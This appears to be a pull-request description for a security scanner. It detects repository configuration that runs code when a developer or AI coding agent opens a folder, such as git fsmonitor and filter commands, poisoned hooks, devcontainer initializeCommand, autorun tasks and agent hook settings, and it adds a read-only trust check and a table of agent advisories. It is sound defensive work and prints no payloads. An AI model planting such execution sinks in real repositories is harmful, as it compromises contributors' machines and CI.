Two rules carry a severity split, and both are about blast radius rather than sophistication. An autorun task with a visible terminal panel is a real chance to notice; `reveal: silent` removes it. `initializeCommand` runs on the host before the container that was meant to contain it exists; every other devcontainer hook runs inside it.

## Precision

The false-positive corpus is the part worth reviewing. Each of these is a fixture that must stay silent:

- `core.fsmonitor = true` selects git's built-in daemon and is a documented performance setting
- Git LFS and git-crypt are the common benign `filter.*` case
- husky and lefthook legitimately redirect `core.hooksPath` — but the exemption never suppresses `WORKSPACE_GIT_HOOK_PRESENT`, because a poisoned `.husky/` is a real attack
- git's shipped `*.sample` hooks
- direnv stdlib helpers, including `layout node`, which would otherwise read as execution

Exemptions match the specific evidence, never the label. The LFS exemption matches the command, not a filter *named* `lfs`. The husky exemption requires an installed marker file. The Ship Safe hook exemption matches the invocation, so a repository cannot opt itself out by writing the scanner's name into a comment — there is a test for exactly that.

`WORKSPACE_AGENT_HOOK_CONFIG` stays silent on the shell and download forms `AgentConfigScanner`'s `CLAUDE_HOOK_*` rules already report. Two findings for one hook is noise and the reader cannot tell one problem from two. Both ends of that arrangement are documented.

## `ship-safe trust [path] --json`

A pre-flight check, not a scan. It reads configuration, writes nothing, and makes no network request, so it is safe to run on a directory you have not decided to trust yet. Exit 0 clean, 1 sinks found, 2 unreadable.

A clean run lists what was checked, because "we looked and found nothing" and "we did not look" are different answers.

Two tests guard the command's own promise: one snapshots the folder and asserts it is byte-identical afterwards, the other plants a task whose command would `touch` a canary file and asserts it never runs.

## The advisory table (#204)

A sink in `.git/config` is a fact about the repository. Whether it fires is a fact about the agent that opens it. `cli/data/agent-advisories.json` separates them — seven entries from GitSpawn and CVE-2026-48124, each citing a source URL and a recorded date.

`affected` is structured rather than a range string: `{lt}`, `{gte,lte}`, or `{exact:[...]}`. Qwen Code and Grok Build use the exact form because the writeup named two versions each, and the versions between them were not tested.

Three states, and the two weak ones are the point. `reachable` requires a detected installed version documented to invoke the sink. An unreadable version, an unparseable version, and a table that fails to load all stay weak — no path turns "we could not tell" into "you are fine". A *patched* local install reports that other agents may still reach the sink rather than clearing the finding.

The table's version and age print on every run including clean ones. It lags disclosure by construction, and a reader who cannot see how stale it is cannot discount it.

## One boundary that needed care

Version detection executes installed binaries, which sits close to what `trust` promises. PATH is filtered before it is searched: no relative entries, no empty entries (POSIX reads those as the current directory), and nothing inside the folder under inspection. Never a shell; cwd is the temp dir. A test plants an executable named after an agent inside the scanned folder, puts that folder on PATH, and asserts it is neither resolved nor run.

## Fixture safety

No hostile fixture is committed. A checked-in `.git/config` carrying an fsmonitor command would be a working attack on this repository's own contributors and CI — `npm test` runs git plenty of times. Every fixture is built into a temp directory at run time and torn down in a `finally`. The rule is documented in `docs/adding-a-security-rule.md`.

## State

1024 tests passing, lint clean of errors. `c1124fc` also ties every user-facing "<n> agents" claim to the registry, so the count cannot drift silently as agents are added.

Not included, tracked separately: #205 baseline drift, #206 capability graph nodes.
